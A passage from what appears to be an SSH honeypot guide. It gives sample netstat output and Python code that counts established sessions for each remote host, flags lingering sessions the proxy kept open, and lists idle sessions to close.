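tcp 0 0 88.222.55.22.22 61.174.51.217.1498 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2490 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.1456 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2814 ESTABLISHED
tcp 0 0 *.22 *.* LISTEN
"""


def split_host_port(endpoint):
    """BSD netstat joins host and port with a dot: '1.2.3.4.22' -> ('1.2.3.4', 22)."""
    host, _, port = endpoint.rpartition(".")
    return host, (None if port == "*" else int(port))


def parse_netstat(text):
    """Turn netstat lines into dicts with local/remote (host, port) and state."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp":
            continue
        rows.append({
            "local": split_host_port(fields[3]),
            "remote": split_host_port(fields[4]),
            "state": fields[5],
        })
    return rows


def established_per_remote(rows, local_port=22):
    """Count ESTABLISHED sessions on the honeypot port, grouped by remote host."""
    counts = Counter()
    for r in rows:
        if r["state"] == "ESTABLISHED" and r["local"][1] == local_port:
            counts[r["remote"][0]] += 1
    return counts


def lingering_remotes(rows, threshold=2, local_port=22):
    """Remote hosts holding more than `threshold` concurrent sessions.

    A single scanner normally needs one session at a time, so several
    ESTABLISHED entries from one host usually mean the proxy kept sessions
    the client already abandoned.
    """
    counts = established_per_remote(rows, local_port)
    return sorted(host for host, n in counts.items() if n > threshold)


def idle_sessions(last_activity, now, idle_limit):
    """Mitigation on the proxy side: sessions whose last byte in either
    direction is older than idle_limit seconds and should be closed by the
    proxy itself rather than left to the firewall's state table."""
    return sorted(sid for sid, seen in last_activity.items() if now - seen >= idle_limit)


def demo():
    rows = parse_netstat(NETSTAT_SAMPLE)
    # Constructed activity table: session id -> unix time of last byte seen.
    last_seen = {"sess-1": 100.0, "sess-2": 950.0, "sess-3": 400.0}
    return {
        "established": sum(established_per_remote(rows).values()),
        "per_remote": dict(established_per_remote(rows)),
        "lingering": lingering_remotes(rows),
        "to_close": idle_sessions(last_seen, now=1000.0, idle_limit=600),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The threshold is a tuning knob, not a rule: on a busy sensor compare it against the per-host session count the firewall reports, and alert only when the proxy's own view and the kernel's disagree for longer than the idle limit.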